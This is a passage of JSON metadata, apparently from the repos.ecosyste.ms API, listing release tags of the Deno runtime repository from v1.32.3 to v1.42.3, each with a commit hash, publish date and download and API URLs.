itHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","mani